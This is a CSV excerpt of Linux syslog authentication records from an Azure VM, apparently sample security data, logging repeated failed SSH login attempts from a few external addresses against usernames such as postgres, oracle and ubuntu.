+5252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:25:49,UbuntuDevEnv,2019-06-26 15:25:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,22052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:25:51,UbuntuDevEnv,2019-06-26 15:25:50,auth,UbuntuDevEnv,info,Failed password for invalid user vps from 192.241.213.168 port 54328 ssh2,22052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,192.241.213.1,54328,,
+5254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:25:51,UbuntuDevEnv,2019-06-26 15:25:51,auth,UbuntuDevEnv,info,Disconnected from invalid user vps 192.241.213.168 port 54328 [preauth],22052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,192.241.213.1,54328,,
+5255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:25:51,UbuntuDevEnv,2019-06-26 15:25:51,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 54328:11: Bye Bye [preauth],22052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,54328,,
+5256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:27:33,UbuntuDevEnv,2019-06-26 15:27:32,auth,UbuntuDevEnv,info,Invalid user craig from 192.241.213.168 port 42820,22414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,craig,192.241.213.1,42820,,
+5257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:27:33,UbuntuDevEnv,2019-06-26 15:27:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,22414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:27:33,UbuntuDevEnv,2019-06-26 15:27:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,22414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:27:35,UbuntuDevEnv,2019-06-26 15:27:35,auth,UbuntuDevEnv,info,Failed password for invalid user craig from 192.241.213.168 port 42820 ssh2,22414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,craig,192.241.213.1,42820,,
+5260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:27:35,UbuntuDevEnv,2019-06-26 15:27:35,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 42820:11: Bye Bye [preauth],22414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,42820,,
+5261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:27:35,UbuntuDevEnv,2019-06-26 15:27:35,auth,UbuntuDevEnv,info,Disconnected from invalid user craig 192.241.213.168 port 42820 [preauth],22414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,craig,192.241.213.1,42820,,
+5262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:29:19,UbuntuDevEnv,2019-06-26 15:29:19,auth,UbuntuDevEnv,info,Invalid user postgres from 192.241.213.168 port 59544,22790,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,192.241.213.1,59544,,
+5263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:29:19,UbuntuDevEnv,2019-06-26 15:29:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,22790,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:29:19,UbuntuDevEnv,2019-06-26 15:29:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,22790,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:29:22,UbuntuDevEnv,2019-06-26 15:29:21,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 192.241.213.168 port 59544 ssh2,22790,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,192.241.213.1,59544,,
+5266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:29:22,UbuntuDevEnv,2019-06-26 15:29:21,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 59544:11: Bye Bye [preauth],22790,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,59544,,
+5267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:29:22,UbuntuDevEnv,2019-06-26 15:29:21,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 192.241.213.168 port 59544 [preauth],22790,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,192.241.213.1,59544,,
+5268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:29:59,UbuntuDevEnv,2019-06-26 15:29:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.172.3.124  user=mysql,22921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql,107.172.3.1,,0,
+5269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:30:01,UbuntuDevEnv,2019-06-26 15:30:00,auth,UbuntuDevEnv,info,Failed password for mysql from 107.172.3.124 port 41334 ssh2,22921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.172.3.1,41334,,
+5270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:30:01,UbuntuDevEnv,2019-06-26 15:30:00,auth,UbuntuDevEnv,info,"Received disconnect from 107.172.3.124 port 41334:11: Normal Shutdown, Thank you for playing [preauth]",22921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.172.3.1,41334,,
+5271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:30:01,UbuntuDevEnv,2019-06-26 15:30:00,auth,UbuntuDevEnv,info,Disconnected from authenticating user mysql 107.172.3.124 port 41334 [preauth],22921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,mysql,107.172.3.1,41334,,
+5272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:31:10,UbuntuDevEnv,2019-06-26 15:31:10,auth,UbuntuDevEnv,info,Invalid user julien from 192.241.213.168 port 48030,23267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,julien,192.241.213.1,48030,,
+5273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:31:10,UbuntuDevEnv,2019-06-26 15:31:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,23267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:31:10,UbuntuDevEnv,2019-06-26 15:31:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,23267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:31:12,UbuntuDevEnv,2019-06-26 15:31:11,auth,UbuntuDevEnv,info,Failed password for invalid user julien from 192.241.213.168 port 48030 ssh2,23267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,julien,192.241.213.1,48030,,
+5276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:31:12,UbuntuDevEnv,2019-06-26 15:31:11,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 48030:11: Bye Bye [preauth],23267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,48030,,
+5277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:31:12,UbuntuDevEnv,2019-06-26 15:31:11,auth,UbuntuDevEnv,info,Disconnected from invalid user julien 192.241.213.168 port 48030 [preauth],23267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,julien,192.241.213.1,48030,,
+5278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:31:13,UbuntuDevEnv,2019-06-26 15:31:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.131.146.22  user=test,23272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,188.131.146.2,,0,
+5279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:31:15,UbuntuDevEnv,2019-06-26 15:31:14,auth,UbuntuDevEnv,info,Failed password for test from 188.131.146.22 port 4483 ssh2,23272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.131.146.2,4483,,
+5280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:31:15,UbuntuDevEnv,2019-06-26 15:31:15,auth,UbuntuDevEnv,info,Received disconnect from 188.131.146.22 port 4483:11: Bye Bye [preauth],23272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.131.146.2,4483,,
+5281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:31:15,UbuntuDevEnv,2019-06-26 15:31:15,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 188.131.146.22 port 4483 [preauth],23272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,188.131.146.2,4483,,
+5282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:32:50,UbuntuDevEnv,2019-06-26 15:32:50,auth,UbuntuDevEnv,info,Invalid user ubuntu from 192.241.213.168 port 36520,23621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,192.241.213.1,36520,,
+5283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:32:50,UbuntuDevEnv,2019-06-26 15:32:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,23621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:32:50,UbuntuDevEnv,2019-06-26 15:32:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,23621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:32:52,UbuntuDevEnv,2019-06-26 15:32:52,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 192.241.213.168 port 36520 ssh2,23621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,192.241.213.1,36520,,
+5286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:32:52,UbuntuDevEnv,2019-06-26 15:32:52,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 36520:11: Bye Bye [preauth],23621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,36520,,
+5287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:32:52,UbuntuDevEnv,2019-06-26 15:32:52,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 192.241.213.168 port 36520 [preauth],23621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,192.241.213.1,36520,,
+5288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:34:23,UbuntuDevEnv,2019-06-26 15:34:23,auth,UbuntuDevEnv,info,Invalid user oracle from 192.241.213.168 port 53240,23953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,192.241.213.1,53240,,
+5289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:34:23,UbuntuDevEnv,2019-06-26 15:34:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,23953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:34:23,UbuntuDevEnv,2019-06-26 15:34:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,23953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:34:25,UbuntuDevEnv,2019-06-26 15:34:25,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 192.241.213.168 port 53240 ssh2,23953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,192.241.213.1,53240,,
+5292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:34:25,UbuntuDevEnv,2019-06-26 15:34:25,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 53240:11: Bye Bye [preauth],23953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,53240,,
+5293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:34:25,UbuntuDevEnv,2019-06-26 15:34:25,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 192.241.213.168 port 53240 [preauth],23953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,192.241.213.1,53240,,
+5294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:35:52,UbuntuDevEnv,2019-06-26 15:35:52,auth,UbuntuDevEnv,info,Invalid user prestashop from 192.241.213.168 port 41730,24265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prestashop,192.241.213.1,41730,,
+5295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:35:52,UbuntuDevEnv,2019-06-26 15:35:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,24265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:35:52,UbuntuDevEnv,2019-06-26 15:35:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,24265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:35:54,UbuntuDevEnv,2019-06-26 15:35:54,auth,UbuntuDevEnv,info,Failed password for invalid user prestashop from 192.241.213.168 port 41730 ssh2,24265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prestashop,192.241.213.1,41730,,
+5298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:35:55,UbuntuDevEnv,2019-06-26 15:35:54,auth,UbuntuDevEnv,info,Disconnected from invalid user prestashop 192.241.213.168 port 41730 [preauth],24265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prestashop,192.241.213.1,41730,,
+5299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:35:55,UbuntuDevEnv,2019-06-26 15:35:54,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 41730:11: Bye Bye [preauth],24265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,41730,,
+5300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:37:23,UbuntuDevEnv,2019-06-26 15:37:22,auth,UbuntuDevEnv,info,Invalid user sradido from 192.241.213.168 port 58448,24592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sradido,192.241.213.1,58448,,
+5301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:37:23,UbuntuDevEnv,2019-06-26 15:37:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,24592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:37:23,UbuntuDevEnv,2019-06-26 15:37:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,24592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:37:25,UbuntuDevEnv,2019-06-26 15:37:24,auth,UbuntuDevEnv,info,Failed password for invalid user sradido from 192.241.213.168 port 58448 ssh2,24592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sradido,192.241.213.1,58448,,
+5304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:37:25,UbuntuDevEnv,2019-06-26 15:37:25,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 58448:11: Bye Bye [preauth],24592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,58448,,
+5305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:37:25,UbuntuDevEnv,2019-06-26 15:37:25,auth,UbuntuDevEnv,info,Disconnected from invalid user sradido 192.241.213.168 port 58448 [preauth],24592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sradido,192.241.213.1,58448,,
+5306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:38:08,UbuntuDevEnv,2019-06-26 15:38:08,auth,UbuntuDevEnv,info,Invalid user lpa from 66.70.130.155 port 42730,24748,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lpa,66.70.130.1,42730,,
+5307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:38:08,UbuntuDevEnv,2019-06-26 15:38:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,24748,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:38:08,UbuntuDevEnv,2019-06-26 15:38:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,24748,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:38:10,UbuntuDevEnv,2019-06-26 15:38:10,auth,UbuntuDevEnv,info,Failed password for invalid user lpa from 66.70.130.155 port 42730 ssh2,24748,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lpa,66.70.130.1,42730,,
+5310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:38:10,UbuntuDevEnv,2019-06-26 15:38:10,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 42730:11: Bye Bye [preauth],24748,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,42730,,
+5311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:38:10,UbuntuDevEnv,2019-06-26 15:38:10,auth,UbuntuDevEnv,info,Disconnected from invalid user lpa 66.70.130.155 port 42730 [preauth],24748,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lpa,66.70.130.1,42730,,
